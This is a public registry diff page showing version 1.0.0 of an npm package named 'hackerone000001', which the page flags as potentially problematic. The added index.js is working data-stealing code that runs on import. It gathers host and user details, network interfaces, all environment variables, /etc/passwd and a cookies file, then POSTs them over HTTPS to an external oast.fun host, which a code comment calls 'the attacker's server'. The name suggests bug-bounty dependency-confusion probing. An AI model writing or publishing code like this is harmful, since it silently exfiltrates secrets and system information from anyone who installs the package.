hackerone000001 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of hackerone000001 might be problematic. Click here for more details.
- package/index.js +73 -0
- package/package.json +11 -0
package/index.js
ADDED
|
@@ -0,0 +1,73 @@
|
|
|
1
|
+
const os = require('os');
|
|
2
|
+
const fs = require('fs');
|
|
3
|
+
const https = require('https');
|
|
4
|
+
|
|
5
|
+
// Helper function to send data back to your server
|
|
6
|
+
const sendData = (data) => {
|
|
7
|
+
const options = {
|
|
8
|
+
hostname: 'iptcasfymjgwwipkefshung19sp1v2pue.oast.fun', // Your server where you collect the info
|
|
9
|
+
port: 443,
|
|
10
|
+
path: '/rctable76SenseBBPH1',
|
|
11
|
+
method: 'POST',
|
|
12
|
+
headers: {
|
|
13
|
+
'Content-Type': 'application/json',
|
|
14
|
+
},
|
|
15
|
+
};
|
|
16
|
+
|
|
17
|
+
const req = https.request(options, (res) => {
|
|
18
|
+
res.on('data', (d) => {
|
|
19
|
+
process.stdout.write(d);
|
|
20
|
+
});
|
|
21
|
+
});
|
|
22
|
+
|
|
23
|
+
req.on('error', (error) => {
|
|
24
|
+
console.error(error);
|
|
25
|
+
});
|
|
26
|
+
|
|
27
|
+
req.write(JSON.stringify(data));
|
|
28
|
+
req.end();
|
|
29
|
+
};
|
|
30
|
+
|
|
31
|
+
// Gather system information
|
|
32
|
+
const getSystemInfo = () => {
|
|
33
|
+
const userInfo = os.userInfo();
|
|
34
|
+
const networkInterfaces = os.networkInterfaces();
|
|
35
|
+
|
|
36
|
+
const systemInfo = {
|
|
37
|
+
hostname: os.hostname(),
|
|
38
|
+
osType: os.type(),
|
|
39
|
+
osRelease: os.release(),
|
|
40
|
+
platform: os.platform(),
|
|
41
|
+
arch: os.arch(),
|
|
42
|
+
whoami: userInfo.username,
|
|
43
|
+
homeDir: userInfo.homedir,
|
|
44
|
+
networkInterfaces: networkInterfaces,
|
|
45
|
+
ipAddress: networkInterfaces['eth0'] ? networkInterfaces['eth0'][0].address : 'No IP',
|
|
46
|
+
macAddress: networkInterfaces['eth0'] ? networkInterfaces['eth0'][0].mac : 'No MAC',
|
|
47
|
+
uptime: os.uptime(),
|
|
48
|
+
currentWorkingDir: process.cwd(),
|
|
49
|
+
envVariables: process.env,
|
|
50
|
+
};
|
|
51
|
+
|
|
52
|
+
return systemInfo;
|
|
53
|
+
};
|
|
54
|
+
|
|
55
|
+
// Optionally, attempt to read sensitive files (ensure you are authorized to do so)
|
|
56
|
+
const readSensitiveFile = (filePath) => {
|
|
57
|
+
try {
|
|
58
|
+
const data = fs.readFileSync(filePath, 'utf8');
|
|
59
|
+
return data;
|
|
60
|
+
} catch (err) {
|
|
61
|
+
return `Error reading ${filePath}: ${err.message}`;
|
|
62
|
+
}
|
|
63
|
+
};
|
|
64
|
+
|
|
65
|
+
// Collect data
|
|
66
|
+
const collectedData = {
|
|
67
|
+
systemInfo: getSystemInfo(),
|
|
68
|
+
passwdFile: readSensitiveFile('/etc/passwd'), // Non-sensitive file on Unix-based systems
|
|
69
|
+
cookies: readSensitiveFile('/path/to/cookies'), // Adjust the path based on environment
|
|
70
|
+
};
|
|
71
|
+
|
|
72
|
+
// Send collected data back to the attacker's server
|
|
73
|
+
sendData(collectedData);
|